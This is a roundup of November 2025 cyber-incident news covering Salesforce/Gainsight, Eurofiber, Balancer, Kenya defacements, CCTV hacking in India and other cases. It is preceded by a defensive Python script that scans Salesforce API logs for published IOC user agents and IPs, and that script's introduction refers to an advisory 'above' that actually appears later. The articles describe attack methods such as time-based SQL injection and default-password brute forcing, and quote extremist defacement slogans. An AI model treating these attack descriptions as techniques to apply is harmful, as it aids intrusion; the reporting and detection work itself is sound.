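The log review Salesforce recommends above (Setup Audit Trail, Event Monitoring, API activity) and the published IOCs come together in a simple scan: match each API event's user agent and client IP against the IOC set, then group the hits by user so the right identities get their sessions and connected-app authorizations reviewed. The following Python is an added example, not code from Salesforce or Gainsight. The two user-agent strings are the ones named in the advisory; the IP set is a placeholder (RFC 5737 documentation addresses) to be replaced with the addresses Salesforce published; the sample rows and the column names USER_ID, CLIENT_IP, USER_AGENT and TIMESTAMP are constructed for illustration and must be mapped onto the columns of a real export.

```python
import csv
import io
from collections import defaultdict
from dataclasses import dataclass

# The two user-agent strings named in Salesforce's published IOC list.
IOC_USER_AGENTS = frozenset({
    "python-requests/2.32.3",
    "Salesforce-Multi-Org-Fetcher/1.0",
})

# Placeholder (constructed, RFC 5737 documentation addresses): replace with
# the IP list from Salesforce's IOC publication before running for real.
IOC_CLIENT_IPS = frozenset({"203.0.113.10", "198.51.100.7"})

# Constructed sample rows. The column names are assumed for this example;
# map a real Event Monitoring or API-activity export onto them.
SAMPLE_LOG = """\
EVENT_TYPE,TIMESTAMP,USER_ID,CLIENT_IP,USER_AGENT,URI
API,20251118T081502Z,005000000000001,203.0.113.10,Salesforce-Multi-Org-Fetcher/1.0,/services/data/v62.0/query
API,20251118T081503Z,005000000000001,203.0.113.10,python-requests/2.32.3,/services/data/v62.0/query
API,20251118T091000Z,005000000000002,192.0.2.44,Mozilla/5.0 (Macintosh; Intel Mac OS X) AppleWebKit/537.36,/lightning/page/home
API,20251118T093000Z,005000000000003,198.51.100.7,curl/8.4.0,/services/data/v62.0/sobjects/Account
API,20251118T100000Z,005000000000002,192.0.2.44,python-requests/2.31.0,/services/data/v62.0/query
"""


@dataclass(frozen=True)
class Hit:
    line_no: int        # physical CSV line; the header is line 1
    timestamp: str
    user_id: str
    client_ip: str
    user_agent: str
    reasons: tuple      # which IOC categories matched this row


def scan_api_log(csv_text, ioc_user_agents=IOC_USER_AGENTS, ioc_client_ips=IOC_CLIENT_IPS):
    """Return the rows whose user agent or client IP matches a published IOC.

    Matching is exact on purpose: python-requests/2.31.0 is not a hit even
    though it differs from the IOC only in version, because the IOC is the
    specific string that was published. Widen the match deliberately if you
    decide the version is not significant in your environment.
    """
    hits = []
    reader = csv.DictReader(io.StringIO(csv_text))
    for row in reader:
        user_agent = (row.get("USER_AGENT") or "").strip()
        client_ip = (row.get("CLIENT_IP") or "").strip()
        reasons = []
        if user_agent in ioc_user_agents:
            reasons.append("ioc_user_agent")
        if client_ip in ioc_client_ips:
            reasons.append("ioc_client_ip")
        if reasons:
            hits.append(Hit(reader.line_num, row.get("TIMESTAMP", ""),
                            row.get("USER_ID", ""), client_ip, user_agent, tuple(reasons)))
    return hits


def summarize_by_user(hits):
    """Group hits per USER_ID: which identities need their sessions and
    connected-app authorizations reviewed, from where, and over what window."""
    summary = defaultdict(lambda: {"events": 0, "ips": set(), "user_agents": set(),
                                   "first": None, "last": None})
    for h in hits:
        s = summary[h.user_id]
        s["events"] += 1
        s["ips"].add(h.client_ip)
        s["user_agents"].add(h.user_agent)
        # Timestamps of the form 20251118T081502Z sort correctly as strings.
        s["first"] = h.timestamp if s["first"] is None else min(s["first"], h.timestamp)
        s["last"] = h.timestamp if s["last"] is None else max(s["last"], h.timestamp)
    return dict(summary)


if __name__ == "__main__":
    found = scan_api_log(SAMPLE_LOG)
    for h in found:
        print(f"line {h.line_no}: user={h.user_id} ip={h.client_ip} ua={h.user_agent!r} reasons={h.reasons}")
    for user, s in summarize_by_user(found).items():
        print(f"{user}: {s['events']} event(s) from {sorted(s['ips'])} between {s['first']} and {s['last']}")
```

Treat a user-agent-only hit as a lead rather than proof: python-requests is a common client, so corroborate it with the IP list, with the Gainsight connected app's integration user, and with what the flagged requests actually queried before concluding that data left the org.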

Middletown to Restart Utility Billing After Major Cyber Incident

21 November 2025 at 04:40

City of Middletown cyberattack

The City of Middletown has released a new update as part of its ongoing cybersecurity restoration following the significant City of Middletown cyberattack that disrupted multiple municipal services earlier this year. The latest announcement, dated November 20, 2025, provides details on the resumption of utility billing, the status of delinquent accounts, and broader system recovery efforts. As part of the continuing cybersecurity restoration process, Middletown officials confirmed that utility billing will restart in December. Because billing systems were offline for several months, the first bills will be based on estimated usage from the same period last year, plus an additional 25% to account for service charges accrued during the outage. Flat-fee services, including refuse, stormwater, and toter charges, will also be back-billed in full and are expected to return to standard billing cycles in January 2026. While the city aims to restore traditional meter readings, officials noted that a firm timeline is not yet available. Until systems are fully repaired, estimated billing will continue into early 2026. Once meter readings resume, actual usage during the outage will be calculated and spread across six billing cycles to minimize the financial burden on residents.

Delinquent Accounts and Service Continuity

During the City of Middletown cyberattack, the city temporarily paused all utility shutoffs, including for accounts already delinquent before the incident. Shutoffs will now resume only for those pre-existing delinquent accounts. Residents with outstanding balances will receive individual notices outlining payment options and steps to prevent service interruption. For support or questions, residents may contact the Utility Billing Office at (513) 425-7870.

City of Middletown Cyberattack: Ongoing System Recovery 

In an earlier update on October 27, 2025, Middletown reported steady progress in restoring core systems. Phone lines, Wi-Fi, and city email accounts are now fully operational, allowing staff to return to regular communication channels with residents. However, certain departments continue to rely on temporary backup processes while the broader network rebuild continues. The cyber event occurred in mid-August, prompting officials to immediately shut down affected systems and bring in third-party cybersecurity specialists to assist with secure restoration and forensic investigation.

Current Department-Level Impact

  • Utility Billing: Still unable to generate new bills until system restoration is complete.
  • Payments: Residents may continue paying previously issued bills via InvoiceCloud or at the City Building.
  • Court Records: In-person court record searches remain available.
  • Police Fingerprint Checks: Not currently available; residents may obtain checks from county, state, or federal agencies.

Data Impact and Ongoing Forensics

The city’s investigation into the cyber event continues with support from external cybersecurity experts. It remains unclear whether any resident data was affected. Officials emphasized that determining what information may have been accessed, and who may be impacted, is a complex, ongoing process. Should the investigation confirm exposure of personal information, the city will notify and assist affected individuals. Middletown also confirmed that it is coordinating with federal, state, and local law enforcement agencies throughout the investigation. At this time, there is no evidence that compromised data has been used for fraudulent activity or identity theft.

Salesforce Warns that Customer Data May Have Been Accessed Through Gainsight App

20 November 2025 at 15:09

Salesforce Warns that Customer Data May Have Been Accessed Through Gainsight App

Salesforce is investigating potential unauthorized access to customers’ Salesforce data that may have occurred through the Gainsight customer success platform. “Our investigation indicates this activity may have enabled unauthorized access to certain customers’ Salesforce data through the app’s connection,” Salesforce said in an advisory today. The Salesforce advisory was short on detail, but the incident appears to share similarities with a recent OAuth-based breach of the Salesloft Drift platform that compromised the Salesforce environments of dozens, if not hundreds, of organizations. That breach was linked to the Scattered LAPSUS$ Hunters threat group. In an email exchange with The Cyber Express, Scattered LAPSUS$ Hunters also claimed responsibility for the current Gainsight incident. “Yes, we are responsible for it,” the group told The Cyber Express. “Nearly 300 organisations are affected by it.” The group named four large organizations allegedly hit in the latest incident, but it is The Cyber Express’ policy not to name unconfirmed cyberattack victims.

Salesforce Detects ‘Unusual Activity’ Involving Gainsight App

Salesforce said in the advisory that it has identified “unusual activity involving Gainsight-published applications connected to Salesforce.” Those apps are installed and managed directly by customers. “Our investigation indicates this activity may have enabled unauthorized access to certain customers’ Salesforce data through the app’s connection,” the CRM vendor said. “Upon detecting the activity, Salesforce revoked all active access and refresh tokens associated with Gainsight-published applications connected to Salesforce and temporarily removed those applications from the AppExchange while our investigation continues.” Salesforce said there is “no indication” that the incident resulted from a vulnerability in the Salesforce platform. “The activity appears to be related to the app’s external connection to Salesforce,” the company said. Salesforce said it has notified known affected customers directly and will continue to provide updates. The CRM vendor said customers who need assistance can reach the company through Salesforce Help.

Salesloft Drift Breach Affected Gainsight Too

It will be some time before the extent of the current incident is known, but the Salesloft Drift incident affected the CRM environments of scores of well-known companies, among them Google, Cloudflare, Palo Alto Networks, and many more prominent names. The Scattered LAPSUS$ threat group launched social engineering attacks on Salesforce environments too. Scattered LAPSUS$ Hunters claims 760 organizations were hit in the Salesloft Drift incident, one of which was Gainsight’s own Salesforce environment. The Cyber Express has reached out to Gainsight for comment and will update this story as new information emerges.

50,000 CCTVs Hacked in India: Intimate Hospital Footage Sold Online

19 November 2025 at 02:28

cybercrime CCTV Hacking

A disturbing case of hacking CCTV systems in India has exposed a widespread cybercrime racket through which intimate videos from a maternity ward were stolen and sold online. Police in Gujarat state say the discovery has raised concerns about surveillance practices in a country where cameras are routinely placed across public and private spaces. The case came to light earlier this year when Gujarati media outlets detected several videos on YouTube. These clips, taken inside a maternity hospital, showed pregnant women undergoing medical examinations and receiving injections in their buttocks. Each video carried a link directing viewers to Telegram channels where longer versions of the footage could be purchased. To protect the privacy of those filmed, the city and the maternity hospital's name have not been disclosed.

From a Single Hospital Breach to a Nationwide Cybercrime Operation 

The hospital director told the BBC that the cameras had been installed "for the safety of doctors" and to guard against false allegations. None of the women seen in the videos has filed a police complaint. Once alerted, investigators uncovered what they described as a massive nationwide cybercrime racket. Police say hackers had infiltrated at least 50,000 CCTV systems throughout India and were selling footage taken from hospitals, schools, residential complexes, offices, malls, and even private homes. Many of the stolen clips were marketed for prices ranging from 800 to 2,000 rupees, while some Telegram operators reportedly offered live feeds through subscription-based access. According to officers, the case demonstrates how weak protection on individual CCTV units lets a single operation compromise thousands of devices.

Arrests, Charges, and the Spread of the Network 

Arrests connected to the network have been made since February, spanning Maharashtra, Uttar Pradesh, Gujarat, Delhi, and Uttarakhand. The suspects face charges under laws addressing privacy violations, cyberterrorism, voyeurism, and the publication of obscene material. Police noted that no patient or hospital lodged an official complaint, largely due to fear of exposure and social stigma. Instead, a police officer formally initiated the case to prevent the matter from being dropped. The breach reflects the widespread vulnerabilities built into India's surveillance ecosystem. Many CCTV units operate with default passwords such as "Admin123," a practice investigators say aided the hackers. Officers reported that the group used brute-force tools to gain access to the camera networks, enabling them to capture feeds from thousands of locations. Specialists advise users to periodically change IP addresses and passwords, conduct routine audits of their systems, and adopt stronger security measures for both home and professional networks.

Growing Concerns About Surveillance and Privacy 

The proliferation of CCTV across India, from hospital wards to private apartments, has created fertile ground for CCTV hacking incidents that expose sensitive footage and disproportionately affect women, who often hesitate to report breaches due to stigma. Despite government efforts to tighten digital security, gaps remain, and this latest breach highlights how quickly insecure systems can be exploited and sensitive data spread online.

DoorDash Confirms Cybersecurity Incident After Social Engineering Attack

19 November 2025 at 02:10

doordash cybersecurity incident

American food delivery platform DoorDash has disclosed a cybersecurity incident in which an unauthorized third party accessed certain user information through a targeted social engineering attack. The company confirmed that the DoorDash data breach affected an unspecified number of users but clarified that no sensitive or financial information was accessed. According to DoorDash's public statement, the incident began when a company employee was manipulated into granting access through a social engineering scam. This reflects a rising trend in which attackers exploit human behavior rather than system weaknesses, posing significant risks even to companies with mature cybersecurity programs.

DoorDash Cybersecurity Incident: Social Engineering Identified as the Root Cause

The company revealed that threat actors did not rely on malware or exploit software vulnerabilities. Instead, they used deceptive tactics to influence an employee and gain initial access. This form of attack continues to challenge organizations, as technical security controls often cannot prevent human error. DoorDash stated that its response team quickly identified the data breach, shut down unauthorized access, and initiated an internal investigation. The company has also referred the matter to law enforcement.

What Information Was Accessed in DoorDash Data Breach

DoorDash confirmed that some users, spanning consumers, Dashers, and merchants, were impacted. The type of user information accessed varied and may have included:
  • First and last name
  • Phone number
  • Email address
  • Physical address
The company emphasized that no sensitive information such as Social Security numbers, government-issued IDs, driver's license details, bank information, or payment card data was compromised in the DoorDash cybersecurity incident. DoorDash added that it has no evidence of fraud, identity theft, or misuse of the accessed information.

DoorDash Response and Security Enhancements

Following the DoorDash cybersecurity incident, the company implemented several measures to strengthen its cybersecurity posture. These steps include:
  • Deploying new security system enhancements to detect and block similar malicious activities
  • Increasing employee security awareness training focused on social engineering threats
  • Engaging an external cybersecurity firm to assist in the investigation and provide expert guidance
  • Coordinating with law enforcement for ongoing inquiry
DoorDash reiterated its commitment to improving user security, stating that it strives to “get 1% better every day” and protect user privacy through continuous improvements.

User Notifications and Support

The company noted that affected users have been notified where required under applicable laws. To address concerns and questions, DoorDash has set up a dedicated call center available in English and French for users in the U.S., Canada, and international regions. Users seeking more information can contact the hotline using reference code B155060. DoorDash also clarified that customers of Wolt or Deliveroo were not impacted by this incident, as the breach was limited exclusively to DoorDash systems and data.

Guidance for Users

While no sensitive data was compromised, DoorDash advised users to remain cautious of unsolicited communications requesting personal information. The company warned users to avoid clicking suspicious links or downloading unexpected attachments, as such tactics are commonly used in social engineering attacks. DoorDash stated that users do not need to take any immediate action to protect their accounts, as the compromised information was limited to basic contact details and there is no evidence of misuse.

Massive Cyberattack Hits Kenyan Ministries, Sites Replaced With Racist Messages

18 November 2025 at 01:08

Government of Kenya cyberattack

The Government of Kenya cyberattack on Monday morning left several ministry websites defaced with racist and white supremacist messages, disrupting access for hours and prompting an urgent response from national cybersecurity teams. The attack targeted multiple high-profile platforms, raising new concerns about the security of public-sector digital infrastructure. According to officials, the websites affected belonged to the ministries of Interior, Health, Education, Energy, Labour, and Water. Users attempting to access the pages were met with extremist messages including "We will rise again," "White power worldwide," and "14:88 Heil Hitler."

Government of Kenya Cyberattack Under Investigation

The Interior Ministry confirmed the Government of Kenya cyberattack, stating that a group identifying itself as "PCP@Kenya" is suspected to be behind the intrusion. Several government websites were rendered temporarily inaccessible while national teams worked to secure affected systems. "Preliminary investigations indicate that the attack is suspected to have been carried out by a group identifying itself as 'PCP@Kenya'," the ministry said. "Following the incident, we immediately activated our incident response and recovery procedures, working closely with relevant stakeholders to mitigate the impact and restore access to the affected platforms." Officials confirmed that the situation has since been contained, with systems placed under continuous monitoring to prevent further disruption. Citizens have been encouraged to reach out to the National KE-CIRT if they have information relevant to the breach.

Regional Cyber Issues Reported Within 24 Hours

The Kenyan incident took place just a day after Somalia reported a cyberattack on its Immigration and Citizenship Agency. Somali officials said they detected a breach involving data from individuals who had entered the country using its e-Visa system. Early findings suggest that the leaked data may include names, dates of birth, photos, marital status, email addresses, and home addresses. Authorities are now assessing how many people were affected and how the attackers gained access to the system. The U.S. Embassy in Somalia referenced claims from November 11, when hackers alleged they had infiltrated the e-visa system and accessed information belonging to at least 35,000 applicants, potentially including U.S. citizens. “While Embassy Mogadishu is unable to confirm whether an individual’s data is part of the breach, individuals who have applied for a Somali e-visa may be affected,” the embassy said.

[Image: Somalia cyber incidents. Source: X]

No Claim of Responsibility So Far

As of Monday afternoon, no threat group had formally claimed responsibility for either the Kenya or Somalia incidents beyond the “PCP@Kenya” signature left on the defaced pages. Investigators are assessing whether the timing suggests any coordination or shared exploitation methods. For now, authorities emphasize that sensitive financial information, core government systems, and essential services in Kenya were not impacted; the attack appears to have been limited to public-facing web platforms. A defacement establishes that the attacker could write to the web servers' content, but not on its own that back-end systems or citizen data were reached, which is what the ongoing investigation has to determine.

Logitech Confirms Data Breach Following CL0P Victim Claims

17 November 2025 at 12:11

Logitech Confirms Data Breach Following CL0P Victim Claims

Logitech International S.A. has confirmed that it was hit by a data breach, the company said in an SEC filing late last week. Logitech’s 8-K filing, released on Nov. 14, was short on details, but the company was named as a victim by the CL0P ransomware group earlier this month as part of the group’s campaign targeting Oracle E-Business Suite (EBS) vulnerabilities. Of roughly 45 organizations claimed as victims by CL0P, only five have confirmed an attack to date: Logitech, The Washington Post, Harvard University, American Airlines’ Envoy Air, and Hitachi’s GlobalLogic. The CL0P campaign is believed to have targeted Oracle EBS vulnerability CVE-2025-61884, contrary to initial reports that the vulnerability targeted was CVE-2025-61882.

Logitech Data Breach Confirmed

Logitech said in its SEC filing that the company “recently experienced a cybersecurity incident relating to the exfiltration of data.” The computer peripherals and software maker said the incident did not impact its products, business operations or manufacturing. After detecting the incident, Logitech said it investigated and responded to the incident with help from unnamed external cybersecurity firms. Logitech said the company “believes that the unauthorized third party used a zero-day vulnerability in a third-party software platform and copied certain data from the internal IT system. ... The data likely included limited information about employees and consumers and data relating to customers and suppliers. Logitech does not believe any sensitive personal information, such as national ID numbers or credit card information, was housed in the impacted IT system.” Logitech said it patched the third-party vulnerability “following its release by the software platform vendor.”

Logitech Says Cyber Insurance Will Cover Incident

The company said it doesn’t believe the incident will have a “material adverse effect” on its financial condition, in part because it holds “a comprehensive cybersecurity insurance policy, which we expect will, subject to policy limits and deductibles, cover costs associated with incident response and forensic investigations, as well as business interruptions, legal actions and regulatory fines, if any.” While only five victims have confirmed they were hit in the Oracle EBS campaign, CL0P has claimed about 45 victims to date on its dark web data leak site. The alleged victims span a wide range of industries, including major electronics companies, energy and utility organizations, technology companies, manufacturers, medical technology companies, healthcare providers, major colleges and universities, insurers, security companies, banks, construction and engineering firms, mining companies and communications companies. CL0P has tended to cluster victims in campaigns built around specific zero-day vulnerabilities throughout its six-year history, including 267 claimed victims in February 2025, a surge that drove ransomware attacks to record highs that month.

Eurofiber France Confirms Data Exfiltration After System Breach

17 November 2025 at 06:34

cybersecurity incident

A cybersecurity incident at Eurofiber France was officially confirmed after the company identified unauthorized activity on November 13, 2025. The incident involved a software vulnerability that allowed a malicious actor to access data from Eurofiber France’s ticket management platform and the ATE customer portal. According to the company, the situation is now under control, with systems secured and additional protective measures implemented.

Cybersecurity Incident Impacted Ticketing Platform and ATE Portal

Eurofiber France stated that the cybersecurity incident affected its central ticket management platform used by regional brands Eurafibre, FullSave, Netiwan, and Avelia. It also impacted the ATE portal, part of Eurofiber France’s cloud services operating under the Eurofiber Cloud Infra France brand. The company confirmed that the attacker exploited a software vulnerability in this shared environment, leading to the exfiltration of customer-related data. The company emphasized that the incident is limited to customers in France using the affected platforms. Customers using Eurofiber services in Belgium, Germany, or the Netherlands, including Eurofiber Cloud Infra in the Netherlands, were not impacted. Eurofiber also noted that the effect on indirect sales and wholesale partners within France remains minimal, as most partners operate on separate systems.

Immediate Response and Containment Measures

Within hours of detecting the breach, Eurofiber France placed both the ticketing platform and the ATE portal under reinforced security. The vulnerability was patched, and additional layers of protection were deployed. The company said its internal teams, working alongside external cybersecurity experts, are now focused on assisting customers in assessing and managing the impact. Eurofiber clarified that no sensitive financial information, such as bank details or regulated critical data stored in other systems, was compromised. All services remained fully operational during the attack, and there was no disruption to customer connectivity or service availability. Customers were notified immediately after the breach was detected. Eurofiber stated it would continue to update affected organizations transparently as the investigation progresses.

Regulatory Notifications and Ongoing Investigation

In line with European regulatory requirements, Eurofiber France has notified the CNIL (France’s Data Protection Authority under GDPR) and reported the incident to ANSSI (the French National Cybersecurity Agency). A police complaint has also been filed in connection with an extortion attempt linked to the attack. The company reaffirmed its commitment to transparency, data protection, and cybersecurity throughout the remediation process.

External Research Points to Larger Data Exposure

International Cyber Digest, a third-party cybersecurity research group, reported that the breach may have exposed information belonging to approximately 3,600 customers. According to its analysis, the threat actor, who uses the handle “ByteToBreach,” gained full access to Eurofiber’s GLPI database, including client data, support tickets, internal messages, passwords, and API keys. The researchers noted that Eurofiber’s GLPI installation may have been running versions 10.0.7 through 10.0.14, which would be outdated and potentially vulnerable; Eurofiber’s own statement refers only to “a software vulnerability” and does not name the product or the flaw.

In comments shared with the researchers, the attacker claimed to have run a slow, time-based SQL injection attack and to have extracted nearly 10,000 password hashes over a period of 10 days, then to have used administrator-level API keys to download internal documents and customer PII. ByteToBreach also claimed to have contacted both GLPI’s developer, Teclib, and Eurofiber to negotiate ransom demands; according to the research group, those attempts received no response. A time-based blind injection of this kind produces a long series of near-identical requests whose response times alternate between near-zero and a fixed delay, a pattern that is visible in web server logs well before any data leaves the database.

Eurofiber France operates over 76,000 kilometers of fiber network and 11 data centers, serving between 9,000 and 12,000 business and government customers, including several major public institutions and private-sector organizations. The company reiterated that all systems have now been secured and that enhanced monitoring and preventive measures are in place, and said its teams remain fully mobilized until the incident is completely resolved.

DDoS Cyberattack Disrupts Danish Government and Defense Websites

14 November 2025 at 02:27

cyberattack on Danish

A cyberattack on Danish institutions disrupted several government and defense-related websites on November 13, according to the country’s Civil Protection Agency. The incident, which involved widespread DDoS attacks, caused temporary outages across multiple online services and prompted authorities to intensify monitoring alongside Denmark’s military intelligence service.

The Civil Protection Agency reported that “several Danish companies and websites were currently experiencing outages and operating disruptions because of DDoS attacks.” As officials noted, a DDoS attack overwhelms a website’s servers by flooding them with traffic, blocking access for legitimate users. The agency said it was “following the situation closely,” indicating the scale and persistence of the disruptions.

Shortly after the attack, the pro-Russian hacker group NoName057 reportedly claimed responsibility on social media. The group alleged it had targeted systems belonging to the Danish government, including the Ministry of Transport and the public-sector portal Borger.dk. Defense contractor Terma was also named in the claims and later confirmed that it had been affected.

Tobias Brun-Falkencrone, a spokesperson for Terma, addressed the situation cautiously. “We’re aware that a Russian hacker group has claimed that it would disrupt our website, as well as the ones of several Danish authorities, but it’s too early to say they are responsible,” he remarked. He emphasized that Terma’s systems responded effectively: “We are well geared to handle this kind of cyberattack and acted quickly. There were no security breaches and no data was lost,” as reported by the Singaporean newspaper The Straits Times.

Attacks Follow Earlier Disruptions Ahead of Local Elections

The November 13 attacks came just a day after NoName057 claimed it had targeted several Danish municipal websites on November 12. These earlier disruptions occurred less than a week before Denmark’s local elections, drawing attention to the country’s strong support for Ukraine and the potential geopolitical motivations behind the digital assaults. International reports, including coverage from AFP and Ukrinform, noted that the cyberattack on Danish institutions aligns with a broader wave of pro-Russia cyber activity affecting European nations. In the Netherlands, Russian hackers recently stole personal data from residents in a municipality. In Poland, a payment system was breached, resulting in the theft of customer information from a major tour company. Ukrinform also highlighted an incident in which Russian state-linked hackers infiltrated systems belonging to a British defense contractor, exposing sensitive employee data on the dark web.

Authorities Continue Monitoring Amid Rising Cyber Threats

A DDoS attack affects availability rather than confidentiality, and the Danish government has not reported any data loss or long-term damage. Even so, the recurring attacks highlight persistent exposure in public infrastructure and defense-linked networks. Authorities have not released detailed technical findings but remain engaged in coordinated oversight to assess potential links to broader geopolitical tensions. The Civil Protection Agency and military intelligence continue to monitor the situation, signaling that Denmark is preparing for additional attempts to disrupt critical digital systems in the near future.

Asahi Cyberattack Brings Japan’s Top Brewer to Its Knees During Peak Beer Season

11 November 2025 at 01:45

Asahi cyberattack

As Japan enters its busiest beer-drinking period, the nation’s biggest brewer, Asahi Group Holdings Ltd., continues to feel the effects of the Asahi cyberattack that has crippled its operations for more than a month. The attack, identified as a ransomware incident, severely disrupted the internal systems that manage online orders and shipments, forcing the brewer to fall back on manual processes and slowing production to a near standstill. According to company representatives, Asahi’s shipments have dropped to just 10 percent of normal levels as the firm processes orders in person, over the phone, and even by fax, a throwback to pre-digital business methods. The disruption comes at a critical time: December typically marks Asahi’s strongest sales period, with its signature Super Dry beer accounting for 12 percent of annual sales. Industry analysts expect that the beer shipment data for October, due out on Thursday, will shed light on how much market share Asahi may have lost to competitors in the wake of the attack, as reported by China Daily.

The Asahi Cyberattack Supply Struggles Hit Bars and Restaurants

The impact of the Asahi cyberattack has been felt sharply across Tokyo’s bustling bar scene. In Shimbashi, Kohei Matsuo, owner of Bier Reise ’98, said that 80 percent of his beer sales once came from Asahi’s Maruefu brand. Within a week of the attack, he was out of stock and had to pivot to other domestic and imported beers. “If supply doesn’t recover and I have to suspend the all-you-can-drink plan, it’s likely to hurt year-end party attendance,” Matsuo said. Meanwhile, in Ueno, Hiroyuki Iida, manager of Izakaya Ueno Ichiba Honten, said his restaurant briefly switched to products from Sapporo Holdings Ltd. and Suntory Holdings Ltd. before receiving limited shipments of Super Dry. However, other Asahi items, including Maruefu and its non-alcoholic beers, remain unavailable. “Wholesalers may be prioritizing larger volume accounts,” Iida noted, adding that the damage has been somewhat milder than initially feared.

Rivals Step In

Competitors have been quick to seize the opportunity. Kirin Holdings Co., Suntory, and Sapporo have been replacing Asahi-branded taps, glassware, and other bar equipment through wholesalers, moves that could make it harder for Asahi to reclaim its presence once supply stabilizes. Analyst Euan Mcleish of Sanford C. Bernstein Japan believes Sapporo stands to gain the most, thanks to its full-malt beer lineup. Following the October 6 attack, Asahi even lost its No. 1 position in Japan’s retail beer market to Kirin, driven by a surge in sales of Kirin’s Ichiban Shibori brand, according to Nikkei point-of-sale data. Kirin has adjusted its shipments to ensure a stable supply as demand grows, while Suntory confirmed receiving numerous distributor inquiries and is scaling production. Sapporo also reported ramping up shipments to meet stronger-than-expected demand.

Retail Market Offers Mixed Picture

Despite the widespread disruption, retail stores show a more varied situation. Some OK Corp outlets in central Tokyo continue to stock Super Dry and Maruefu, though shelves for other Asahi products are emptying fast. Major convenience store chains such as Seven & i Holdings Co., FamilyMart Co., and Lawson Inc. still have a steady supply of Super Dry, though shortages of soft drinks and energy beverages from Monster Beverage Corp., which Asahi distributes, are becoming noticeable. Online retailers show a similar pattern: Amazon Japan lists a 24-pack of Super Dry for ¥5,040, while Aeon Co. offers a 10-can gift set for ¥2,380, with delivery scheduled between December 1 and January 10. In contrast, department stores such as Isetan Mitsukoshi Holdings Ltd. and Takashimaya Co. list many Asahi beer gifts as sold out, a setback for Japan’s year-end gifting tradition, when premium food and beverages are exchanged to express gratitude.

Financial Fallout and Future Risks

The Asahi cyberattack highlights how even major corporations can falter when outdated systems meet modern threats. Analyst Euan Mcleish predicts a ¥15 billion fourth-quarter loss and a 13 percent profit shortfall, while experts such as Professor Tetsutaro Uehara point to Asahi’s fragmented legacy systems as a key weakness exploited during the attack.

University of Pennsylvania Confirms Cyberattack and Data Theft Following Social Engineering Breach

University of Pennsylvania

The University of Pennsylvania has confirmed that a hacker stole sensitive university data during a recent cyberattack. The breach, first detected on October 31, 2025, resulted in unauthorized access to systems connected to the university’s development and alumni activities. Initially, the University of Pennsylvania dismissed reports of a hack as “fraudulent.” However, officials later acknowledged that data was indeed taken. In a statement released to alumni and shared publicly, the university explained that staff “rapidly locked down the systems and prevented further unauthorized access; however, not before an offensive and fraudulent email was sent to our community and information was taken by the attacker.”

The University of Pennsylvania Breach and Attack Details

The attackers gained access through social engineering, deceiving an individual into revealing their credentials. Once inside, the hackers sent a mass email from official university addresses. The email read: “We got hacked. We love breaking federal laws like FERPA (all your data will be leaked). Please stop giving us money.” According to reports, the hackers compromised a PennKey single sign-on account, which gave them access to multiple internal systems, including the university’s VPN, Salesforce databases, SAP systems, and SharePoint files. This access reportedly lasted nearly two days, from October 30 to October 31, before being detected and contained. An internal source said that the university requires multi-factor authentication (MFA) for student, staff, and alumni accounts. However, some senior officials were allegedly granted exemptions from the MFA requirement. An account exempt from MFA is protected by its password alone, so a phished credential is sufficient on its own to take it over; the university has not said whether the compromised account was one of the exempted ones. When asked about the MFA exemptions or adoption rates, a university spokesperson declined to comment beyond the official data incident page.

Scope of the Data Theft

While the full scope of the data breach remains unclear, reports suggest that as many as 1.2 million records may have been compromised. The stolen data reportedly includes names, contact details, donation records, estimated net worth, and demographic information such as race, religion, and sexual orientation. The hacker also claimed to have accessed documents related to donor activities and bank transaction receipts. Although the university is still assessing the damage, officials confirmed that medical systems operated by Penn Medicine were not affected. As required by law, the university will contact individuals whose personal data was compromised, though no timeline has been announced.

Investigation and Legal Fallout

The University of Pennsylvania has reported the incident to the Federal Bureau of Investigation (FBI) and enlisted third-party cybersecurity experts to assist in the investigation. Despite these actions, the university is already facing potential legal consequences. At least one class-action lawsuit has been filed by former students, accusing the university of negligence in protecting personal data. The hackers’ motivations appear mixed. In the initial message to the university community, the attackers criticized legacy admissions and affirmative action policies, stating, “We hire and admit morons because we love legacies, donors, and unqualified affirmative action admits.” However, further statements from the group indicate their primary motive was financial, aiming to profit from the stolen data rather than make a political statement.

Balancer Hack Exposes $116 Million Smart Contract Vulnerability

Balancer data breach

Balancer V2, one of the most prominent automated market makers (AMMs), has suffered a large-scale security incident. Although widely reported as a data breach, no user data was taken; the attacker exploited a critical vulnerability in Balancer’s smart contract infrastructure to siphon as much as $128 million worth of digital assets from the platform in minutes. The exploit stemmed from a flaw in the V2 vault and its liquidity pools. Investigations by blockchain analysts found that a maliciously deployed contract abused Balancer’s pool initialization process. This contract manipulated internal calls in the vault, bypassing protection meant to prevent unauthorized swaps or balance changes. The vulnerability was tied to a faulty check in the manageUserBalance function, where the internal validation mechanism (_validateUserBalanceOp) could be bypassed. By exploiting this loophole, the attacker was able to specify unauthorized parameters and drain funds from the vault without proper permission. The attack began with a series of rapid Ethereum mainnet transactions before expanding across several networks. The composable design of Balancer V2, where multiple pools share a single vault, amplified the impact: a flaw at the vault level is reachable from every pool that depends on it.

Extent of the Balancer Data Breach

Preliminary data shows the attacker stole between $110 million and $116 million, with some estimates reaching $128 million, making it one of the largest DeFi exploits of 2025. The stolen assets included several liquid staking derivatives and wrapped tokens such as WETH, wstETH, osETH, frxETH, rsETH, and rETH. Most of the funds, around $70 million, were drained from the Ethereum mainnet, while the Base and Sonic networks lost approximately $7 million combined. Other chains accounted for at least $2 million in additional losses. On-chain activity shows that the stolen assets were funneled into newly created wallets, with funds later moved through cross-chain bridges and likely laundered through privacy mixers. Despite the scale of the exploit, investigators confirmed that no private keys were compromised; the incident was purely a smart contract exploit.

Security Audits and Community Reactions

What makes the Balancer hack particularly notable is that the protocol had undergone more than ten independent audits. Its V2 vault was reviewed three separate times by different security firms. Yet the exploit still occurred, a fact that has reignited debate over the reliability of DeFi audits. Suhail Kakar noted on X (formerly Twitter): “Balancer went through 10+ audits. The vault was audited three separate times by different firms—still got hacked for $110M. This space needs to accept that ‘audited by X’ means almost nothing. Code is hard, DeFi is harder.” Other blockchain researchers echoed similar concerns, emphasizing that composable DeFi systems, where smart contracts interact in complex, interdependent ways, create additional attack vectors even when individual components appear secure. This is not Balancer’s first security challenge. The platform previously suffered smaller incidents, including a $520,000 exploit in June 2020, an $11.9 million attack in March 2023, and a $2.1 million loss in August 2023 due to precision vulnerabilities in its V2 Boosted Pools.

User Warnings and Aftermath

Experts urged users exposed to Balancer V2 pools to take immediate precautions: 
  1. Withdraw funds from affected pools as soon as possible. 
  2. Revoke smart contract approvals for Balancer-related addresses via platforms such as Revoke, DeBank, or Etherscan. 
  3. Monitor wallet activity using tools like Dune Analytics or Etherscan to spot unusual transactions. 
